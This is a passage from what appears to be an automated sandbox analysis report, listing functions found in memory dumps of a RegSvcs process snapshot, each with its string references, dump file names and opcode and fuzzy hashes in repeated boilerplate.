(, xrefs: 01168D3B

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 495309c0a07749e15a4368e5b1a794603ab1ae861a8260ad0cceade7e2efb19c
Instruction ID: 9ce246522e7db0ad31673ac4f8596366920585173771ff1754d332b9da1f8905
Opcode Fuzzy Hash: 495309c0a07749e15a4368e5b1a794603ab1ae861a8260ad0cceade7e2efb19c
Instruction Fuzzy Hash: CB916971E00759CFDB29CFA8C840ADEBBF5BF69314F204169E815AB391D772A941CB60

Function 01142F47 Relevance: 1.4, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

, xrefs: 011431A3

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 71391b8a45cb5f3def91567231b81fb367961a814b9d56804e3e1d14c8448550
Instruction ID: b9f2af13af2531972a90c51c0bf560ee479e902457c84930e2881a960ae9552d
Opcode Fuzzy Hash: 71391b8a45cb5f3def91567231b81fb367961a814b9d56804e3e1d14c8448550
Instruction Fuzzy Hash: 2981BE31E14659DFDB2ACFA8D484BACBBF1FF05B14F188069E865AB352D735A940CB00

Function 01142F5B Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

, xrefs: 011431A3

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 0d7b040bdbe4e92aaea64d1f9dc591e89e1a74859bbf467f355963127e24e6c2
Instruction ID: 5de6fcad0500ea0c7c0302b6d02b42d48bc4b6793611b31a11821c96d81091ba
Opcode Fuzzy Hash: 0d7b040bdbe4e92aaea64d1f9dc591e89e1a74859bbf467f355963127e24e6c2
Instruction Fuzzy Hash: 6D81BF31E14659DFDB2ACF58D484BACBBF1FF05B14F188069E865AB352D735A940CB00

Function 01142A45 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

u)j, xrefs: 01142C2D

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: u)j
API String ID: 0-1146774532
Opcode ID: 92c8d4b707361b8248bd369bc079b5ee4bd82dc0e20399e5a80e201cec0f97a4
Instruction ID: caf177bc77e90bb552cca7d6420bb768c5e0616f229efcd6cb1a549c1bad093a
Opcode Fuzzy Hash: 92c8d4b707361b8248bd369bc079b5ee4bd82dc0e20399e5a80e201cec0f97a4
Instruction Fuzzy Hash: CE515632B006248FEB2DCF59E8447BABBB1FB45F00F15405AF8459B681D735A882CBA1

Function 0112CCC8 Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

@, xrefs: 0112CD63

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 5e2891b35ef59fcaeee258fe096bf86b0210b1af342c1864dc9fe5f0d8afe1c3
Instruction ID: eb3568d14e9c6a823b14017150179403ccd7082e514b0c1335fcc775a2317be1
Opcode Fuzzy Hash: 5e2891b35ef59fcaeee258fe096bf86b0210b1af342c1864dc9fe5f0d8afe1c3
Instruction Fuzzy Hash: F55114765043569BDB18EF28D444B6FB7E8AF88718F04492FFA85D3240E730D904CBA2

Function 0112A580 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

(, xrefs: 0112A668

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: ab757b4199b2cc18b7364143f3cf63cc23982a2f4879ded1e593b0c895978a6b
Instruction ID: eab10039948006d6a0915beb2b23ab513b8e25e83b1cebc5dd87d81b59d46436
Opcode Fuzzy Hash: ab757b4199b2cc18b7364143f3cf63cc23982a2f4879ded1e593b0c895978a6b
Instruction Fuzzy Hash: 6B5125B0A1166ADFCB19CF98D480ACDBBF9FF08714F10822AE409AB641D774A951CB94

Function 01132140 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

(, xrefs: 01132253

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: e552d837b95d4bfad81ac398f23db1ca99597753cae7aa6ea5580c68a28f461d
Instruction ID: 9a18f84807034c735456b62d00a163b200022afe0709c5a4b65e0f3fb579b36d
Opcode Fuzzy Hash: e552d837b95d4bfad81ac398f23db1ca99597753cae7aa6ea5580c68a28f461d
Instruction Fuzzy Hash: 2D512CB1D0161AEFCB19DF99C88069DFBB0FF48724F50422EE918A7684D375A951CFA0

Function 011428D0 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

twj, xrefs: 011428FA

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: twj
API String ID: 0-1637908201
Opcode ID: 69c797532c8faf1f4464d2a8a7b4b0ad98daa528c325603dde15c30bccb22177
Instruction ID: 06bfc411d25c8ccbb2cdc2da6938334b938882e248fee23eb16ed0f3459a9575
Opcode Fuzzy Hash: 69c797532c8faf1f4464d2a8a7b4b0ad98daa528c325603dde15c30bccb22177
Instruction Fuzzy Hash: B051A171B003599BEF2DDF98D844BAEBBB6AF80B44F24401DE9156B284DB35AC41CB50

Function 0116C6A6 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 011A8181, 011A81F5

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: minkernel\ntdll\ldrredirect.c
API String ID: 0-3694840737
Opcode ID: dd471dbb746190d19483858bda818c96938939c3465830208e9a23e17269eef0
Instruction ID: a443850a5e60294b3bc00bc4a2742a5acb911258fe026b0b7d2750c271f0499b
Opcode Fuzzy Hash: dd471dbb746190d19483858bda818c96938939c3465830208e9a23e17269eef0
Instruction Fuzzy Hash: FD31E472644346AFD32CEF28D945E2ABBA4BF94B24F040558F9856B395E720EC04C7A2

Function 011B4DD7 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrutil.c, xrefs: 011B4E06

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: minkernel\ntdll\ldrutil.c
API String ID: 0-4055692389
Opcode ID: a00ef0d029bb80146bd630447e2e36e345e128dcf9963ba773ac11b8040d6cdc
Instruction ID: a0dd750eec3852336d7f3849b931b7d9a12cba3191d85e9a4fbcbd646355cc51
Opcode Fuzzy Hash: a00ef0d029bb80146bd630447e2e36e345e128dcf9963ba773ac11b8040d6cdc
Instruction Fuzzy Hash: F721BEB31481217FE72C9A6C9CC5EA6BF9CFB81A64F148014F223E6D86C764DD01C221

Function 01158DBF Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74079f810b526b41d6c0faebc493a38e9a35fc87742a7881bfabe82196f87887
Instruction ID: b1848c6f41fe410570927f055851fec74d1f97aa6dcc49f7156c5ed26de9fbdb
Opcode Fuzzy Hash: 74079f810b526b41d6c0faebc493a38e9a35fc87742a7881bfabe82196f87887
Instruction Fuzzy Hash: 19224B70E0021ADBDF5DCF9AD4809BEFBF6AF48304B15805AE965AB241E734DE41CB61

Function 011328F0 Relevance: .4, Instructions: 446COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6030b064c13b6a2951f58239acad54659381844f05c19d816cdd57740eec506a
Instruction ID: 117ac4fd2c2c0b10bd34c0b3a55e385a745d4c3f57536c265dfcd2e8e7013845
Opcode Fuzzy Hash: 6030b064c13b6a2951f58239acad54659381844f05c19d816cdd57740eec506a
Instruction Fuzzy Hash: C6F1F2316083519BE72EEF2CC44476ABBE1BFC8754F18492DE98587388E774D841C792

Function 01154A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc7f223a89905c55a10d9bd692523c34124fc1ad656d048a5470a2d6266029e
Instruction ID: 28693fc995b4bcc797c20a5a27ae8efdf707e60b9156f86fef58794dff985d2b
Opcode Fuzzy Hash: ebc7f223a89905c55a10d9bd692523c34124fc1ad656d048a5470a2d6266029e
Instruction Fuzzy Hash: ACF18D70E0021ADBDF5DCFA9D480BAEBBF5AF48714F048129ED25AB640E734D881CB60

Function 0113A9D0 Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41dadddedc925b285b6b43198f98b9db215c1e93d296c4b43526824a1ef6bd48
Instruction ID: 3fa9f962db41abfe42f009d1ef0a030d42478033524a99dad851ff8df5925716
Opcode Fuzzy Hash: 41dadddedc925b285b6b43198f98b9db215c1e93d296c4b43526824a1ef6bd48
Instruction Fuzzy Hash: 49E1C271E00219AFEF2ECFA8D980BAEBBB9FF84314F050425E961E7259D7349941CB11

Function 01128397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 903ebd8f8b8000617b996373521b056e2d20b121623dc263844e759deb25ff10
Instruction ID: dbd3721bd50455911c24647dd2c498ca11f3c21d7f75a9a355a593f6fc4f320c
Opcode Fuzzy Hash: 903ebd8f8b8000617b996373521b056e2d20b121623dc263844e759deb25ff10
Instruction Fuzzy Hash: CDD1F471A006269BDB1CDF69C890BBA77F5FF54308F15822DE912DB280E734E961CB61

Function 011365D0 Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c062f28696a9e4ddacf6318f43d418d339946eb294f94ec4374469e1d1a397d2
Instruction ID: b26b3181848266baf760d11b5890f598269601dc93b3a0947f42d5f8a30858d5
Opcode Fuzzy Hash: c062f28696a9e4ddacf6318f43d418d339946eb294f94ec4374469e1d1a397d2
Instruction Fuzzy Hash: 79E19F71608342DFC719CF28C090A6ABBE1FFC8318F45896DE99587355E731EA45CB92

Function 011B8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44fc8e8e43da417eb9280bef980917e355e266e3dfe67b355ffa181fa1ff9558
Instruction ID: 947a9bdf657a187e1d8aa9c805e990e8cdf230e75d53eaaa35f16ca8f9794fab
Opcode Fuzzy Hash: 44fc8e8e43da417eb9280bef980917e355e266e3dfe67b355ffa181fa1ff9558
Instruction Fuzzy Hash: EDB14F75A00605AFDB28DF99C980AEBBBBDFF84704F14446DEA4297790DB34E905CB10

Function 01140535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd700fbd03bf2adbb2211fea5898c4dae515c14471c26ec91a7b73b47cf98cd
Instruction ID: 192e9c881e885f9782851e0a75263cb82085f15f8dc5dacf391148cc6e53deb1
Opcode Fuzzy Hash: 7fd700fbd03bf2adbb2211fea5898c4dae515c14471c26ec91a7b73b47cf98cd
Instruction Fuzzy Hash: E9B12731600646AFDF2DDBA9C850BBEBBF6EF48604F190159E6529B381D730ED42CB91

Function 01150DE1 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b2f61026ef9dcf14fa3080113d76201dc610c5645a872f62baa9e2284329d24
Instruction ID: d65e96ea603c0446d55d3965caac8b7ace99ac4e7c56fb78714053159c5e4d48
Opcode Fuzzy Hash: 4b2f61026ef9dcf14fa3080113d76201dc610c5645a872f62baa9e2284329d24
Instruction Fuzzy Hash: 8DC17D70E00219EFDB2DDFE9D884AEDBBB5FF48304F10412AE925AB245E771A945CB41

Function 011383C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

